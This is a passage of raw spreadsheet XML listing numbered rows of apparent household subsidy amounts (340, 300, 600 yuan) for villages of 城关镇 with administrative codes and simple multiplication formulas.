      <c r="K519" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="520" ht="23" customHeight="1" spans="1:11">
      <c r="A520" s="13" t="s">
        <v>1461</v>
      </c>
      <c r="B520" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C520" s="14" t="s">
        <v>1289</v>
      </c>
      <c r="D520" s="14" t="s">
        <v>1462</v>
      </c>
      <c r="E520" s="14" t="s">
        <v>419</v>
      </c>
      <c r="F520" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G520" s="14">
        <v>1</v>
      </c>
      <c r="H520" s="14">
        <v>340</v>
      </c>
      <c r="I520" s="14">
        <f t="shared" si="21"/>
        <v>340</v>
      </c>
      <c r="J520" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K520" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="521" ht="23" customHeight="1" spans="1:11">
      <c r="A521" s="13" t="s">
        <v>1463</v>
      </c>
      <c r="B521" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C521" s="14" t="s">
        <v>1289</v>
      </c>
      <c r="D521" s="14" t="s">
        <v>1464</v>
      </c>
      <c r="E521" s="14" t="s">
        <v>273</v>
      </c>
      <c r="F521" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G521" s="14">
        <v>1</v>
      </c>
      <c r="H521" s="14">
        <v>340</v>
      </c>
      <c r="I521" s="14">
        <f t="shared" si="21"/>
        <v>340</v>
      </c>
      <c r="J521" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K521" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="522" ht="23" customHeight="1" spans="1:11">
      <c r="A522" s="13" t="s">
        <v>1465</v>
      </c>
      <c r="B522" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C522" s="14" t="s">
        <v>1289</v>
      </c>
      <c r="D522" s="14" t="s">
        <v>1466</v>
      </c>
      <c r="E522" s="14" t="s">
        <v>933</v>
      </c>
      <c r="F522" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G522" s="14">
        <v>2</v>
      </c>
      <c r="H522" s="14">
        <v>300</v>
      </c>
      <c r="I522" s="14">
        <f t="shared" si="21"/>
        <v>600</v>
      </c>
      <c r="J522" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K522" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="523" ht="23" customHeight="1" spans="1:11">
      <c r="A523" s="13" t="s">
        <v>1467</v>
      </c>
      <c r="B523" s="14" t="str">
        <f>B522</f>
        <v>城关镇</v>
      </c>
      <c r="C523" s="14" t="str">
        <f>C522</f>
        <v>城关镇西北村</v>
      </c>
      <c r="D523" s="13" t="s">
        <v>1468</v>
      </c>
      <c r="E523" s="13" t="s">
        <v>548</v>
      </c>
      <c r="F523" s="14" t="str">
        <f>F522</f>
        <v>4113210106</v>
      </c>
      <c r="G523" s="14"/>
      <c r="H523" s="14"/>
      <c r="I523" s="14"/>
      <c r="J523" s="14"/>
      <c r="K523" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="524" ht="23" customHeight="1" spans="1:11">
      <c r="A524" s="13" t="s">
        <v>1469</v>
      </c>
      <c r="B524" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C524" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D524" s="14" t="s">
        <v>1470</v>
      </c>
      <c r="E524" s="14" t="s">
        <v>269</v>
      </c>
      <c r="F524" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G524" s="14">
        <v>1</v>
      </c>
      <c r="H524" s="14">
        <v>340</v>
      </c>
      <c r="I524" s="14">
        <f>H524*G524</f>
        <v>340</v>
      </c>
      <c r="J524" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K524" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="525" ht="23" customHeight="1" spans="1:11">
      <c r="A525" s="13" t="s">
        <v>1471</v>
      </c>
      <c r="B525" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C525" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D525" s="14" t="s">
        <v>1472</v>
      </c>
      <c r="E525" s="14" t="s">
        <v>1473</v>
      </c>
      <c r="F525" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G525" s="14">
        <v>1</v>
      </c>
      <c r="H525" s="14">
        <v>340</v>
      </c>
      <c r="I525" s="14">
        <f>H525*G525</f>
        <v>340</v>
      </c>
      <c r="J525" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K525" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="526" ht="23" customHeight="1" spans="1:11">
      <c r="A526" s="13" t="s">
        <v>1474</v>
      </c>
      <c r="B526" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C526" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D526" s="14" t="s">
        <v>1475</v>
      </c>
      <c r="E526" s="14" t="s">
        <v>320</v>
      </c>
      <c r="F526" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G526" s="14">
        <v>1</v>
      </c>
      <c r="H526" s="14">
        <v>340</v>
      </c>
      <c r="I526" s="14">
        <f>H526*G526</f>
        <v>340</v>
      </c>
      <c r="J526" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K526" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="527" ht="23" customHeight="1" spans="1:11">
      <c r="A527" s="13" t="s">
        <v>1476</v>
      </c>
      <c r="B527" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C527" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D527" s="14" t="s">
        <v>1477</v>
      </c>
      <c r="E527" s="14" t="s">
        <v>1093</v>
      </c>
      <c r="F527" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G527" s="14">
        <v>2</v>
      </c>
      <c r="H527" s="14">
        <v>300</v>
      </c>
      <c r="I527" s="14">
        <f>H527*G527</f>
        <v>600</v>
      </c>
      <c r="J527" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K527" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="528" ht="23" customHeight="1" spans="1:11">
      <c r="A528" s="13" t="s">
        <v>1478</v>
      </c>
      <c r="B528" s="14" t="str">
        <f>B527</f>
        <v>城关镇</v>
      </c>
      <c r="C528" s="14" t="str">
        <f>C527</f>
        <v>城关镇东北村</v>
      </c>
      <c r="D528" s="14" t="s">
        <v>1479</v>
      </c>
      <c r="E528" s="14" t="s">
        <v>592</v>
      </c>
      <c r="F528" s="14" t="str">
        <f>F527</f>
        <v>4113210103</v>
      </c>
      <c r="G528" s="14"/>
      <c r="H528" s="14"/>
      <c r="I528" s="14"/>
      <c r="J528" s="14"/>
      <c r="K528" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="529" ht="23" customHeight="1" spans="1:11">
      <c r="A529" s="13" t="s">
        <v>1480</v>
      </c>
      <c r="B529" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C529" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D529" s="14" t="s">
        <v>1481</v>
      </c>
      <c r="E529" s="14" t="s">
        <v>438</v>
      </c>
      <c r="F529" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G529" s="14">
        <v>1</v>
      </c>
      <c r="H529" s="14">
        <v>340</v>
      </c>
      <c r="I529" s="14">
        <f>H529*G529</f>
        <v>340</v>
      </c>
      <c r="J529" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K529" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="530" ht="23" customHeight="1" spans="1:11">
      <c r="A530" s="13" t="s">
        <v>1482</v>
      </c>
      <c r="B530" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C530" s="14" t="s">
        <v>1369</v>
      </c>
      <c r="D530" s="14" t="s">
        <v>1483</v>
      </c>
      <c r="E530" s="14" t="s">
        <v>331</v>
      </c>
      <c r="F530" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G530" s="14">
        <v>1</v>
      </c>
      <c r="H530" s="14">
        <v>340</v>
      </c>
      <c r="I530" s="14">
        <f>H530*G530</f>
        <v>340</v>
      </c>
      <c r="J530" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K530" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="531" ht="23" customHeight="1" spans="1:11">
      <c r="A531" s="13" t="s">
        <v>1484</v>
      </c>
      <c r="B531" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C531" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D531" s="14" t="s">
        <v>1485</v>
      </c>
      <c r="E531" s="14" t="s">
        <v>1486</v>
      </c>
      <c r="F531" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G531" s="14">
        <v>1</v>
      </c>
      <c r="H531" s="14">
        <v>340</v>
      </c>
      <c r="I531" s="14">
        <f>H531*G531</f>
        <v>340</v>
      </c>
      <c r="J531" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K531" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="532" ht="23" customHeight="1" spans="1:11">
      <c r="A532" s="13" t="s">
        <v>1487</v>
      </c>
      <c r="B532" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C532" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D532" s="14" t="s">
        <v>1488</v>
      </c>
      <c r="E532" s="14" t="s">
        <v>1489</v>
      </c>
      <c r="F532" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G532" s="14">
        <v>1</v>
      </c>
      <c r="H532" s="14">
        <v>340</v>
      </c>
      <c r="I532" s="14">
        <f>H532*G532</f>
        <v>340</v>
      </c>
      <c r="J532" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K532" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="533" ht="23" customHeight="1" spans="1:11">
      <c r="A533" s="13" t="s">
        <v>1490</v>
      </c>
      <c r="B533" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C533" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D533" s="14" t="s">
        <v>1491</v>
      </c>
      <c r="E533" s="14" t="s">
        <v>1492</v>
      </c>
      <c r="F533" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G533" s="14">
        <v>2</v>
      </c>
      <c r="H533" s="14">
        <v>300</v>
      </c>
      <c r="I533" s="14">
        <f>H533*G533</f>
        <v>600</v>
      </c>
      <c r="J533" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K533" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="534" ht="23" customHeight="1" spans="1:11">
      <c r="A534" s="13" t="s">
        <v>1493</v>
      </c>
      <c r="B534" s="14" t="str">
        <f>B533</f>
        <v>城关镇</v>
      </c>
      <c r="C534" s="14" t="str">
        <f>C533</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D534" s="13" t="s">
        <v>1494</v>
      </c>
      <c r="E534" s="13" t="s">
        <v>249</v>
      </c>
      <c r="F534" s="14" t="str">
        <f>F533</f>
        <v>4113210108</v>
      </c>
      <c r="G534" s="14"/>
      <c r="H534" s="14"/>
      <c r="I534" s="14"/>
      <c r="J534" s="14"/>
      <c r="K534" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="535" ht="23" customHeight="1" spans="1:11">
      <c r="A535" s="13" t="s">
        <v>1495</v>
      </c>
      <c r="B535" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C535" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D535" s="14" t="s">
        <v>1496</v>
      </c>
      <c r="E535" s="14" t="s">
        <v>232</v>
      </c>
      <c r="F535" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G535" s="14">
        <v>1</v>
      </c>
      <c r="H535" s="14">
        <v>340</v>
      </c>
      <c r="I535" s="14">
        <f>H535*G535</f>
        <v>340</v>
      </c>
      <c r="J535" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K535" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="536" ht="23" customHeight="1" spans="1:11">
      <c r="A536" s="13" t="s">
        <v>1497</v>
      </c>
      <c r="B536" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C536" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D536" s="14" t="s">
        <v>1498</v>
      </c>
      <c r="E536" s="14" t="s">
        <v>1499</v>
      </c>
      <c r="F536" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G536" s="14">
        <v>1</v>
      </c>
      <c r="H536" s="14">
        <v>340</v>
      </c>
      <c r="I536" s="14">
        <f>H536*G536</f>
        <v>340</v>
      </c>
      <c r="J536" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K536" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="537" ht="23" customHeight="1" spans="1:11">
      <c r="A537" s="13" t="s">
        <v>1500</v>
      </c>
      <c r="B537" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C537" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D537" s="14" t="s">
        <v>1501</v>
      </c>
      <c r="E537" s="14" t="s">
        <v>405</v>
      </c>
      <c r="F537" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G537" s="14">
        <v>1</v>
      </c>
      <c r="H537" s="14">
        <v>340</v>
      </c>
      <c r="I537" s="14">
        <f>H537*G537</f>
        <v>340</v>
      </c>
      <c r="J537" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K537" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="538" ht="23" customHeight="1" spans="1:11">
      <c r="A538" s="13" t="s">
        <v>1502</v>
      </c>
      <c r="B538" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C538" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D538" s="14" t="s">
        <v>1503</v>
      </c>
      <c r="E538" s="14" t="s">
        <v>1504</v>
      </c>
      <c r="F538" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G538" s="14">
        <v>1</v>
      </c>
      <c r="H538" s="14">
        <v>340</v>
      </c>
      <c r="I538" s="14">
        <f>H538*G538</f>
        <v>340</v>
      </c>
      <c r="J538" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K538" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="539" ht="23" customHeight="1" spans="1:11">
      <c r="A539" s="13" t="s">
        <v>1505</v>
      </c>
      <c r="B539" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C539" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D539" s="14" t="s">
        <v>1506</v>
      </c>
      <c r="E539" s="14" t="s">
        <v>1507</v>
      </c>
      <c r="F539" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G539" s="14">
        <v>2</v>
      </c>
      <c r="H539" s="14">
        <v>340</v>
      </c>
      <c r="I539" s="14">
        <f>H539*G539</f>
        <v>680</v>
      </c>
      <c r="J539" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K539" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="540" ht="23" customHeight="1" spans="1:11">
      <c r="A540" s="13" t="s">
        <v>1508</v>
      </c>
      <c r="B540" s="14" t="str">
        <f>B539</f>
        <v>城关镇</v>
      </c>
      <c r="C540" s="14" t="str">
        <f>C539</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D540" s="17" t="s">
        <v>1509</v>
      </c>
      <c r="E540" s="17" t="s">
        <v>340</v>
      </c>
      <c r="F540" s="14" t="str">
        <f>F539</f>
        <v>4113210108</v>
      </c>
      <c r="G540" s="14"/>
      <c r="H540" s="14"/>
      <c r="I540" s="14"/>
      <c r="J540" s="14"/>
      <c r="K540" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="541" ht="23" customHeight="1" spans="1:11">
      <c r="A541" s="13" t="s">
        <v>1510</v>
      </c>
      <c r="B541" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C541" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D541" s="14" t="s">
        <v>1511</v>
      </c>
      <c r="E541" s="14" t="s">
        <v>983</v>
      </c>
      <c r="F541" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G541" s="14">
        <v>2</v>
      </c>
      <c r="H541" s="14">
        <v>300</v>
      </c>
      <c r="I541" s="14">
        <f>H541*G541</f>
        <v>600</v>
      </c>
      <c r="J541" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K541" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="542" ht="23" customHeight="1" spans="1:11">
      <c r="A542" s="13" t="s">
        <v>1512</v>
      </c>
      <c r="B542" s="14" t="str">
        <f>B541</f>
        <v>城关镇</v>
      </c>
      <c r="C542" s="14" t="str">
        <f>C541</f>
        <v>城关镇东北村</v>
      </c>
      <c r="D542" s="13" t="s">
        <v>1513</v>
      </c>
      <c r="E542" s="13" t="s">
        <v>1514</v>
      </c>
      <c r="F542" s="14" t="str">
        <f>F541</f>
        <v>4113210103</v>
      </c>
      <c r="G542" s="14"/>
      <c r="H542" s="14"/>
      <c r="I542" s="14"/>
      <c r="J542" s="14"/>
      <c r="K542" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="543" ht="23" customHeight="1" spans="1:11">
      <c r="A543" s="13" t="s">
        <v>1515</v>
      </c>
      <c r="B543" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C543" s="14" t="s">
        <v>1270</v>
      </c>
      <c r="D543" s="14" t="s">
        <v>1516</v>
      </c>
      <c r="E543" s="14" t="s">
        <v>1517</v>
      </c>
      <c r="F543" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G543" s="14">
        <v>1</v>
      </c>
      <c r="H543" s="14">
        <v>340</v>
      </c>
      <c r="I543" s="14">
        <f t="shared" ref="I543:I549" si="22">H543*G543</f>
        <v>340</v>
      </c>
      <c r="J543" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K543" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="544" ht="23" customHeight="1" spans="1:11">
      <c r="A544" s="13" t="s">
        <v>1518</v>
      </c>
      <c r="B544" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C544" s="14" t="s">
        <v>1246</v>
      </c>
      <c r="D544" s="14" t="s">
        <v>1519</v>
      </c>
      <c r="E544" s="14" t="s">
        <v>306</v>
      </c>
      <c r="F544" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G544" s="14">
        <v>1</v>
      </c>
      <c r="H544" s="14">
        <v>340</v>
      </c>
      <c r="I544" s="14">
        <f t="shared" si="22"/>
        <v>340</v>
      </c>
      <c r="J544" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K544" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="545" ht="23" customHeight="1" spans="1:11">
      <c r="A545" s="13" t="s">
        <v>1520</v>
      </c>
      <c r="B545" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C545" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D545" s="14" t="s">
        <v>1521</v>
      </c>
      <c r="E545" s="14" t="s">
        <v>239</v>
      </c>
      <c r="F545" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G545" s="14">
        <v>1</v>
      </c>
      <c r="H545" s="14">
        <v>340</v>
      </c>
      <c r="I545" s="14">
        <f t="shared" si="22"/>
        <v>340</v>
      </c>
      <c r="J545" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K545" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="546" ht="23" customHeight="1" spans="1:11">
      <c r="A546" s="13" t="s">
        <v>1522</v>
      </c>
      <c r="B546" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C546" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D546" s="14" t="s">
        <v>1523</v>
      </c>
      <c r="E546" s="14" t="s">
        <v>269</v>
      </c>
      <c r="F546" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G546" s="14">
        <v>1</v>
      </c>
      <c r="H546" s="14">
        <v>340</v>
      </c>
      <c r="I546" s="14">
        <f t="shared" si="22"/>
        <v>340</v>
      </c>
      <c r="J546" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K546" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="547" ht="23" customHeight="1" spans="1:11">
      <c r="A547" s="13" t="s">
        <v>1524</v>
      </c>
      <c r="B547" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C547" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D547" s="14" t="s">
        <v>1525</v>
      </c>
      <c r="E547" s="14" t="s">
        <v>392</v>
      </c>
      <c r="F547" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G547" s="14">
        <v>1</v>
      </c>
      <c r="H547" s="14">
        <v>340</v>
      </c>
      <c r="I547" s="14">
        <f t="shared" si="22"/>
        <v>340</v>
      </c>
      <c r="J547" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K547" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="548" ht="23" customHeight="1" spans="1:11">
      <c r="A548" s="13" t="s">
        <v>1526</v>
      </c>
      <c r="B548" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C548" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D548" s="14" t="s">
        <v>1527</v>
      </c>
      <c r="E548" s="14" t="s">
        <v>1528</v>
      </c>
      <c r="F548" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G548" s="14">
        <v>1</v>
      </c>
      <c r="H548" s="14">
        <v>340</v>
      </c>
      <c r="I548" s="14">
        <f t="shared" si="22"/>
        <v>340</v>
      </c>
      <c r="J548" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K548" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="549" ht="23" customHeight="1" spans="1:11">
      <c r="A549" s="13" t="s">
        <v>1529</v>
      </c>
      <c r="B549" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C549" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D549" s="14" t="s">
        <v>1530</v>
      </c>
      <c r="E549" s="14" t="s">
        <v>1531</v>
      </c>
      <c r="F549" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G549" s="14">
        <v>2</v>
      </c>
      <c r="H549" s="14">
        <v>300</v>
      </c>
      <c r="I549" s="14">
        <f t="shared" si="22"/>
        <v>600</v>
      </c>
      <c r="J549" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K549" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="550" ht="23" customHeight="1" spans="1:11">
      <c r="A550" s="13" t="s">
        <v>1532</v>
      </c>
      <c r="B550" s="14" t="str">
        <f>B549</f>
        <v>城关镇</v>
      </c>
      <c r="C550" s="14" t="str">
        <f>C549</f>
        <v>东北村</v>
      </c>
      <c r="D550" s="13" t="s">
        <v>1533</v>
      </c>
      <c r="E550" s="13" t="s">
        <v>484</v>
      </c>
      <c r="F550" s="14" t="str">
        <f>F549</f>
        <v>4113210103</v>
      </c>
      <c r="G550" s="14"/>
      <c r="H550" s="14"/>
      <c r="I550" s="14"/>
      <c r="J550" s="14"/>
      <c r="K550" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="551" ht="23" customHeight="1" spans="1:11">
      <c r="A551" s="13" t="s">
        <v>1534</v>
      </c>
      <c r="B551" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C551" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D551" s="14" t="s">
        <v>1535</v>
      </c>
      <c r="E551" s="14" t="s">
        <v>1536</v>
      </c>
      <c r="F551" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G551" s="14">
        <v>2</v>
      </c>
      <c r="H551" s="14">
        <v>300</v>
      </c>
      <c r="I551" s="14">
        <f>H551*G551</f>
        <v>600</v>
      </c>
      <c r="J551" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K551" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="552" ht="23" customHeight="1" spans="1:11">
      <c r="A552" s="13" t="s">
        <v>1537</v>
      </c>
      <c r="B552" s="14" t="str">
        <f>B551</f>
        <v>城关镇</v>
      </c>
      <c r="C552" s="14" t="str">
        <f>C551</f>
        <v>中华村</v>
      </c>
      <c r="D552" s="13" t="s">
        <v>1538</v>
      </c>
      <c r="E552" s="13" t="s">
        <v>1382</v>
      </c>
      <c r="F552" s="14" t="str">
        <f>F551</f>
        <v>4113210108</v>
      </c>
      <c r="G552" s="14"/>
      <c r="H552" s="14"/>
      <c r="I552" s="14"/>
      <c r="J552" s="14"/>
      <c r="K552" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="553" ht="23" customHeight="1" spans="1:11">
      <c r="A553" s="13" t="s">
        <v>1539</v>
      </c>
      <c r="B553" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C553" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D553" s="14" t="s">
        <v>1540</v>
      </c>
      <c r="E553" s="14" t="s">
        <v>1541</v>
      </c>
      <c r="F553" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G553" s="14">
        <v>1</v>
      </c>
      <c r="H553" s="14">
        <v>340</v>
      </c>
      <c r="I553" s="14">
        <f>H553*G553</f>
        <v>340</v>
      </c>
      <c r="J553" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K553" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="554" ht="23" customHeight="1" spans="1:11">
      <c r="A554" s="13" t="s">
        <v>1542</v>
      </c>
      <c r="B554" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C554" s="14" t="s">
        <v>286</v>
      </c>
      <c r="D554" s="14" t="s">
        <v>1543</v>
      </c>
      <c r="E554" s="14" t="s">
        <v>548</v>
      </c>
      <c r="F554" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G554" s="14">
        <v>1</v>
      </c>
      <c r="H554" s="14">
        <v>340</v>
      </c>
      <c r="I554" s="14">
        <f>H554*G554</f>
        <v>340</v>
      </c>
      <c r="J554" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K554" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="555" ht="23" customHeight="1" spans="1:11">
      <c r="A555" s="13" t="s">
        <v>1544</v>
      </c>
      <c r="B555" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C555" s="14" t="s">
        <v>263</v>
      </c>
      <c r="D555" s="14" t="s">
        <v>1545</v>
      </c>
      <c r="E555" s="14" t="s">
        <v>284</v>
      </c>
      <c r="F555" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G555" s="14">
        <v>2</v>
      </c>
      <c r="H555" s="14">
        <v>300</v>
      </c>
      <c r="I555" s="14">
        <f>H555*G555</f>
        <v>600</v>
      </c>
      <c r="J555" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K555" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="556" ht="23" customHeight="1" spans="1:11">
      <c r="A556" s="13" t="s">
        <v>1546</v>
      </c>
      <c r="B556" s="14" t="str">
        <f>B555</f>
        <v>城关镇</v>
      </c>
      <c r="C556" s="14" t="str">
        <f>C555</f>
        <v>西北村</v>
      </c>
      <c r="D556" s="13" t="s">
        <v>1547</v>
      </c>
      <c r="E556" s="13" t="s">
        <v>269</v>
      </c>
      <c r="F556" s="14" t="str">
        <f>F555</f>
        <v>4113210106</v>
      </c>
      <c r="G556" s="14"/>
      <c r="H556" s="14"/>
      <c r="I556" s="14"/>
      <c r="J556" s="14"/>
      <c r="K556" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="557" ht="23" customHeight="1" spans="1:11">
      <c r="A557" s="13" t="s">
        <v>1548</v>
      </c>
      <c r="B557" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C557" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D557" s="14" t="s">
        <v>1549</v>
      </c>
      <c r="E557" s="14" t="s">
        <v>306</v>
      </c>
      <c r="F557" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G557" s="14">
        <v>1</v>
      </c>
      <c r="H557" s="14">
        <v>340</v>
      </c>
      <c r="I557" s="14">
        <f>H557*G557</f>
        <v>340</v>
      </c>
      <c r="J557" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K557" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="558" ht="23" customHeight="1" spans="1:11">
      <c r="A558" s="13" t="s">
        <v>1550</v>
      </c>
      <c r="B558" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C558" s="14" t="s">
        <v>230</v>
      </c>
      <c r="D558" s="14" t="s">
        <v>1551</v>
      </c>
      <c r="E558" s="14" t="s">
        <v>569</v>
      </c>
      <c r="F558" s="14" t="s">
        <v>233</v>
      </c>
      <c r="G558" s="14">
        <v>1</v>
      </c>
      <c r="H558" s="14">
        <v>340</v>
      </c>
      <c r="I558" s="14">
        <f>H558*G558</f>
        <v>340</v>
      </c>
      <c r="J558" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K558" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="559" ht="23" customHeight="1" spans="1:11">
      <c r="A559" s="13" t="s">
        <v>1552</v>
      </c>
      <c r="B559" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C559" s="14" t="s">
        <v>507</v>
      </c>
      <c r="D559" s="14" t="s">
        <v>1553</v>
      </c>
      <c r="E559" s="14" t="s">
        <v>560</v>
      </c>
      <c r="F559" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G559" s="14">
        <v>1</v>
      </c>
      <c r="H559" s="14">
        <v>340</v>
      </c>
      <c r="I559" s="14">
        <f>H559*G559</f>
        <v>340</v>
      </c>
      <c r="J559" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K559" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="560" ht="23" customHeight="1" spans="1:11">
      <c r="A560" s="13" t="s">
